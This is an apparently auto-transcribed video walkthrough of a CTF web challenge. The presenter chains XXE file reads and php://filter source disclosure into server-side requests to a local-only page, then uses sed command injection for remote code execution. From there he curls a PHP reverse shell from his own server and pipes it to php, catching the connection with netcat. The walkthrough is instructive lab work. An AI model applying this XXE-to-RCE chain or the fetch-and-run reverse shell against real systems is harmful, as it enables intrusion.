 Hello everyone, my name is John Hammond, and I wanted to showcase some of the all-army cyber stakes. So this was ACICTF Cyberstakes.acictf.com they put on a competition throughout this past week And they had a lot of fantastic challenges So I really wanted to showcase some of them to you so hopefully this will be the first video that I'm recording I hope to do many many more What I want to do is actually start with some of the harder challenges that I was able to solve So I don't burn out what I'm trying to record all these because there are a lot of them And I'd still like to be able to showcase all of them for you or as many as I can So this challenge is called extremely malicious language. It was worth 300 points. I guess at the time of recording right now 32 people have solved it. It's currently Friday the game ends on Sunday So I want to get this recording in before they took some of the challenges down It says there's a six cyber map see if you can gain RCE to execute dot slash flag Okay, so if I fire this up in another page looks like I'm greeted with just sort of a little log in Over here that requires a username and password Last pass is trying to fill some stuff in for me so when I Fill that in just with given credentials. I don't admittedly I Can't guess what they are So I don't know exactly what to do on that and I don't want to add these to last pass So Truth be told and I'll be as transparent as I can be with all of you Because this is running out of the Pico CTF framework a lot of fantastic stuff in here They do offer hints for some of these challenges and I Like to be open and honest with you. This is all about learning this is all about education This is all about us trying to sharpen our skills So if there's no like point degradation or if they don't if they don't cost anything to take a hint I'm gonna look at the hints. I think that's interesting. That's cool, right? When a black hat crosses your X path When a dark entity can reveal a lot about your operation Okay, take command of the system and check out source dot zip if you're stuck Oh, is that just a thing we can access if I try to go to source dot zip? Okay, looks like that is just a thing I can download So let me actually create a directory for us to start to work in this I'll create a little ACI and then I will go ahead and W get that down. Well, let's actually make a challenge name for this extremely malicious Language hop over there. Now we'll W get that source file It is a zip file so we can go ahead and unzip it. It looks like it gives us web root Web root web root web root and all these PHP files. So, okay, looks like we're working with PHP then Let's take a look at the index dot PHP Let me pause to kind of clear up my sublime text notes here Okay, I also noticed my webcam was a little off. So hopefully that's a little bit better of me And I'll try and shrink that down if it gets too big But anyway, this is the source code for our index. It will load in funcs dot PHP Looks like that's necessary for the page. And if we are logged in Oh, it will okay offer us a page to log out And it will try and bring us to gen map and create a little text area form Okay, if we aren't logged in that PHP L statement there. It says Post to log in dot PHP with text username. Okay, this the input fields that we are looking at so funcs dot PHP We should totally check out along with log in dot PHP. So let's take a look at that my face is in the way already I'm just gonna shrink me Okay Now let's go check out that login dot PHP require funcs log in start and it will log in with Post username and post password. So it looks like those are the just the entry fields that I'll need to supply They'll get passed in with the HTTP method of post to that form and login is probably a function inside of funcs dot PHP So let's fire that up. Oh, okay. It looks like we have functions to parse XML and That must be back on the index page. What this form is XML Cybermap CN country. Okay, so these are forms we could give to XML read creds Function my file will open creds dot XML. Do we have that file? LS Do we not have creds that XML? Is it on the page? Is that something we can access creds dot XML? Ah Doesn't have any style information is associated with it, but user is admin and pass is Empty does that work if I just log in with admin and nothing. Okay. Now we're logged in So we have this entry little text area where we could supply Seemingly some XML and then generate it and there's that login button that we saw. So let's go ahead and click this Okay we generated a map that seems with Some of the countries that were probably in This prefix here Maybe highlighted. Oh Generate yeah, okay So let's look more kind of what that's what that's doing because we have the source code. So log in That function will read out of the creds that we just got from read creds Is that an X path? Oh, yeah Maybe that's something that we could have seen like if I were to log out log in that doesn't have it either Huh, I Didn't pay too much mind to that X path. I will totally admit so We had the source code and we could go ahead and log in now that we found where that location is and That is what it allows us to do so back in that index page It looks like once we post our input in that text area. It'll go to gen map dot PHP So let's go see what that is. Do we have that source code? Yep. We do Okay Choir's funks again creates a session for us Gen map is what is being? Ran maybe Not yet. It seems like so it needs a name entry out of the XML It needs at least one country And that's supposed to be an array and it'll validate that each country has Two capital letters in it and that looks pretty solid. I can't use like a there's no E or I I can't control that regex to do anything interesting with PHP that might give me some potential code execution with that Avenue So that looks sound at least from first glance, right? Target what it goes to itself to make dot PHP and passes in these arguments the countries that we supplied the ones that were validated and the name and then it will Make a curl request with these curl exec challenge. Okay. Otherwise, it'll output die on Generating that map. Okay, and then it will run it with all the input that we supplied and output that out Okay, so we could totally just finagle this to whatever we want, right? Please subscribe generate Okay, and that put it in the title up here So if I view the source on that web page looks like the title of that page is what's being Returned using the countries might be annoying because we're limited in what we can supply O.L. It has to be Only two letters anything With a typo in it, whatever Maybe okay, maybe it just didn't care. It just throws those out That's fine So looking at this it looks like we have an interface to work with XML So I guess we can kind of gather that off of the name of this challenge extremely malicious language or XML The whole point is that this could potentially be an XXE attack and that might be referenced in This other hint here a dark entity can reveal reveal a lot about your operation. So maybe we could run some of Those external entities that are necessary for an XXE attack So I'll search for payload all the things XXE injection I have this kind of in my history because I obviously done this previously So what we could be doing with XXE is usually like load files or read some specific files or Perhaps load another entity or a DTD or document type definition to maybe X fill some data out of that server so This will be kind of interesting to be able to determine whether or not we can actually get code execution so Let's start to let's start to finagle this what I'm gonna do is I'll create a just in this current directory here just a test or a pock.xml I guess like a proof of concept and I'll copy and paste that payload that's just a proof of concept from payload all the things and I'll go ahead and grab in The same definition that I might need From what the page supplies because we're probably going to need to keep the exact same element name So we'll need cyber map and the name and country etc. I don't think I need that but Doctype replace Example there so that will just replace that in so if I change cyber map to That example syntax It'll get the value that we read out of this entity that XML is going to be providing for us because of that XXE Abuse here, so it should say cyber dough if that works. So slap that in generate it And there we go so I can see over in the title here that says cyber dough, okay So what could we do with this right? If we go back at the XXE we could be able to use this to actually get information out of the file system We could read files that would be handy We could try and read file It's that repassword because that looks like a simple proof of concept the syntax that they change here is just using System as kind of the prefix and I guess test works fine here. Let's Try and finagle that They're using a different setup doc type doc type all this and they have a new line on XXE that's what they're referring to Let's let's just let's copy that and try that guy Doc type foo element foo could be any entity XXE will read from a specific file for us So let's try that now. It's no longer called example, but the variable is going to be XXE and We'll slap that in to the little test around there. Okay, that had an error We could try well, it's weird to me because when we when we look at this earlier It's only filling this in at the line for the title Maybe if it has a multiple lines in that output it'll get kind of an annoyed and freaked out So let's try something else that might actually only have one line in it like host name And we'll see if that actually returns for us or if it's our syntax. It's wrong. Oh, no, no, no that works So if I view the source here now, it says cyber Challenge dot prod so a little production challenge. I guess but that is the value inside of our etc host name file so That could work potentially looks like we can read files, but we still are kind of limited in what files we can read because Well, it's it's limited by a line, right? So Let's try and expand on this. We know that PHP is installed So if I keep looking at some of these payload all the things here They might be using some other techniques to maybe use a PHP filter or a PHP wrapper to be able to read some of these files Or get some access here. They're using that filter Converting it to base 64 and then specifying a specific resource So let's use that and then let's try and Read etc password again. So it's that repass will be the final resource that we need We'll go slap that in for our XML and that seems to fail. Okay Is there anything else we could read that might be worthwhile for us? Well, we could try and get just the source code like index dot PHP is what we know the name of the source code is so let's paste that in and That seemed to work if I view the source now we have this giant base 64 string So let's verify that that is exactly What we expected let me copy that open up a simple terminal here I'll just echo all of that noise into base 64 tack D And okay, we are getting in fact the same index dot PHP that we saw So we could potentially read the source code of the web page We could get some of the valuable information that's kind of behind this application Interestingly enough though when we were looking through the source code that we retrieved that we were able to download with that source dot zip It mentioned in that gen map function or the gen map dot PHP script. It's calling out to make dot PHP So is that something we could access can I get to make dot PHP kind of on my own? Make dot PHP unauthorized locals only that's weird Well, we don't have access to this page. I guess from the outside but We know with our xx e attack We could read in a file and it doesn't matter if it has new lines now because we learned about that PHP filter trick Maybe we could actually access that make dot PHP page let's see if We slap this in Will that work for us? Can I read the source code of make dot PHP nice looks like it got that base 64? So let me try and get this here that Will throw into our terminal again just to base 64 decode it Pipe that to base 64 tack D and I'll redirect it to our make dot PHP So I could sub all that get some good syntax highlighting and it says remote address is not working because containers are The future and the future is now. Okay, this should effectively restricted local request only so that was the error that we saw It looks like only itself can request this page only the application or what's running on challenge at a CI So I can't reach it From my own browser like we just tried okay So what we do if this page actually gets to execute and what's really happening when we make this request in GenMap When we give it our XML it will take the countries that this page has validated and It will run them in a expression or it looks like a command looks like it's running said with Joining all of the country variables Okay, just so piping them together not piping them but making them an or statement like for regular expressions for said And all of that is filled with a world that SVG And that's the file that it must use. Okay, and then just displays it all out echo that With the name in there with HTML special characters So probably know like cross-site scripting or weirdness, but anyway, it's running shell execute it's like running commands and We have potentially a vector To get some code execution there because it's working with that get variable or the country that we can supply But we know that limitation of Having only uppercase two uppercase letters in the country. So that doesn't work all that well for us except Because we could use this XXE attack, maybe we could have it request this page Can it request like any page that we want like if I just so let me let me get to my server. I'll just go up to a Location out in the real world that's not behind that would actually have a like let's make a directory XML Get in there and then let's run a simple HTTP server. I'll use Python 3 I think Python 2 is still what's aliases to regular Python on quad 8 So if I were to go access John Hammond org at 8888, I See myself. That's good. Can I make that web page go to it? If I change that payload? Can I maybe I could use it with the PHP response with the with the filter here. So let's HTTP colon slash slash John Hammond org at quad 8 move all this in Please get me back to a page where I can actually use the XML good. Oh That rendered and I saw the request. Okay fantastic. So if I view this now, I have the base 64 output of that Good good Echo Let's just verify that that actually is Returning what we would expect it to base 64 tech D. Yep. Good. That gets the HTML of the response from the server so We could make this application call that make dot PHP page or reach out to it and Maybe it could oh It won't try and validate the country variable Only the gen map script does so we could have unlimited access to what that country variable might be and we might be able to break Our way out of this command that's being executed. That's running. So if I look at this, let me just Kind of sketchboard this out here said works with an expression Make this all on one line. It joins me in to single quotes Single quotes. So that's the command. So if I break out of single quotes said might fail but it will still Work right and then it adds in the country Let's try that in the terminal Let me close that and then let's just like let's run a stupid said command And if if this were where I was injecting other commands something that maybe we could get the server to run We could close out of our single quote and then have a colon or semicolon to start a new command and then do something like ID So said will whine, but that doesn't matter. I don't care. I want the output of that command. So maybe we could get that to work if we give it a Country list and a name literally anything so Let's try that. Let me try to get to that page How do they how are they access it in gen map? Do they reach it on the port? They do they reach it on the port so Make dot PHP with some of the get variables in there and I want that all to be URL encoded because it might do some weird things Inside of XML inside of xxc. So let me try and do that. I think that's in Python. So Python 3. Yep, that's fine import URL lib Dot parse right. Yeah, so URL lib dot parse dot URL encode And that takes a dictionary, doesn't it? Yeah, okay. So We want our country as a list to have a single quote a semicolon and then a command and then Let's add a comment just to remove the whole rest of that that line there And then we will supply a name that can be Literally anything that we want that can be please up. Sure So now those are going to be the arguments that we would give to that call in our XML, right, so when we Use PHP filter to get the base 64 response return from this web page that we can call locally with the arguments of country to be whatever we want and Please sub as the name Let's try that Just to see what we could do Generate that worked. Okay, so checking this out. We have all this base 64 here. Let's go ahead and see what that responds with Crap, I probably need that because I want to be able to edit that again. Let me import URL lib one last time URL lib wo dot parse and let's make a new shell just so I can echo This string into base 64 tack D and it returned The output of the ID command. Oh my gosh. Excellent. Okay. Okay, so We have code execution, right? We could potentially run commands. What? Can we do? We would like to get a reverse shell, right? I mean ideally, but I don't know what we have actually accessible on that machine So let's see What commands might work, let's go back and copy our URL lib Syntax here, so the commands that we want to run Let's see if we have curl curl See if we have netcat. Let's see if we have W get Let's see if we have Python and Let's actually check out what directory we're in so We could script this when I have tried to do this PHP and the XML stuff didn't seem to behave when I had Python send along I didn't find out why nor did I particularly care to honestly, but This method wasn't all that bad just kind of creating it and then sending it along Grabbing all that HTML out so Let's see now if we echo this guy into base 64 attack D. What have we got? We have curl We have netcat. We have W get and we seemingly have Python and we're in this path For the web route. Okay, so if we have curl then We could just download a PHP reverse shell. Could we not I? I need to be back on my server so Let me try to netcat LNVP quad 8 to listen and wait for that So we have something out there on the internet for it to connect back to and Let's go create Have another shell open here that I'm working with so Let's go Make a reverse shell that we Could host Also on that server. So, okay, let anyway, let's move into that directory. So aci Extremely malicious language. Let's copy our opt reverse shell Your php reverse shell right over to this directory. Let's Subtle that And let's make it connect back to Johnhammon.org because that's what I'm going to use as my Kind of by ob bring your own box all on quad 8 And let's actually move that to Like rev shell dot php. Just so it's nice and easy for us. So now let's go put that over on my machine. So scp of rev shell over to Johnhammon.org out there in the world in the cloud And home john xml right Okay, good. So now We can ssh to johnhammon.org and spin up a simple web server Just as we had previously. So that victim could go ahead and download the rev shell And give it to php because php is probably already installed because it's running php, right? So python threat tack three python three. Sorry tack m Hdp.server. Let's open it on quad nine Let me make sure that my firewall is totally cool with that. Yep, it is Okay, let's spin that one more time just so I can see the output and let's make Our command Which needs to be in this url in coded form Let's make him go ahead and curl Hdp colon slash last johnhammon.org on Quad nine rev shell dot php and let's pipe that to php. So once that downloads It will go ahead and access This net catch shell, which is waiting and listening. That's going to catch our reverse shell Let's try that That url encoded output needs to be what we supply as our argument So let's Make these both visible And let's go fire this up paste that in here Generate so it reached back to the server. There we go and we have our shell. Okay fantastic. So Uh, did we have python we it said we had python User bin python will that work for me user bin python taxi print hello Hello, okay, so user bin python taxi import pty Pty dot spawn bin bash Just to get a stable shell great. Let's background that stty raw minus echo and background that and now let's export term equals x term Now I can clear my screen and work with things nice and easily Okay, I'm in the root directory. Where the heck was I? We had that output. Do I have a home? I don't have a home Oh Well, okay What was the path to that we saw just a moment ago Opt problem something Did we have that in here? No, that was Oh, there we go op problems extremely malicious language all the way to their web root So let's get back to that other shell where we are interacting with the target. Let's paste that in Wow, that screwed up my prompt. Uh, let's export ps1 to equal The literal dollar sign There we go. Okay ls flag nice. So ls tack la flag is actually a binary I went ahead and ran file on it and it could see like that's an executable. So if I dot slash flag There we go That's the solution. That's the answer That's the flag that would get us 300 points. So A little bit of a long-winded challenge with a lot of cool moving parts, right? So a website that has xxc in it So or at least it's vulnerable to xml external entities We could use that to Read files We could use some of the php filters to read files In a filtered way like with base 64 encoding And that would allow us to go ahead and actually get files that are longer than one line Because we could do it with the name, but we were kind of limited in the functionality of that country Variable we could supply so we were able to go ahead and actually use The local file inclusion that we essentially just had to go read the other Source code and the other pages of the website that we wouldn't normally have had access to and we found There is one Endpoint make dot php that is actually running a command with our input like with an htp get variable And if we were to request just that page like locally because it needed to be accessed through itself Again using our xxc attack We would be able to run code. We just needed to break out of the sed command that was already running and then we could Get whatever we wanted to we had code execution at that point So we could try and get it over shell so we could access it and then well Now we have the flag and we have access to that machine. So super duper cool challenge. I really hope you guys liked it 300 points. So hopefully it was one of those big hitters one way and bam stuff But uh, that's all I wanted to showcase for this challenge for this video extremely malicious language I hope to be recording a lot more of these. I hope there are there are actually a ton that I want to get through And I think a lot of these would be really really cool to show you so All right That's it for this this video everybody. Thank you so much for watching. I'll see you in the next one Please click click that like button. Wow. I'm fading out. I've been talking for too long Hit that like button leave a comment subscribe hit the bell all the other youtube algorithm stuff And I'd love to see you guys on patreon. Thank you so much for your support PayPal if you're willing to drop something quick and easy see on the discord There's a link in the description instagram facebook twink twinked in litter Oh god, I need to stop this video. Thanks everybody. I'll see you in the next one. Take care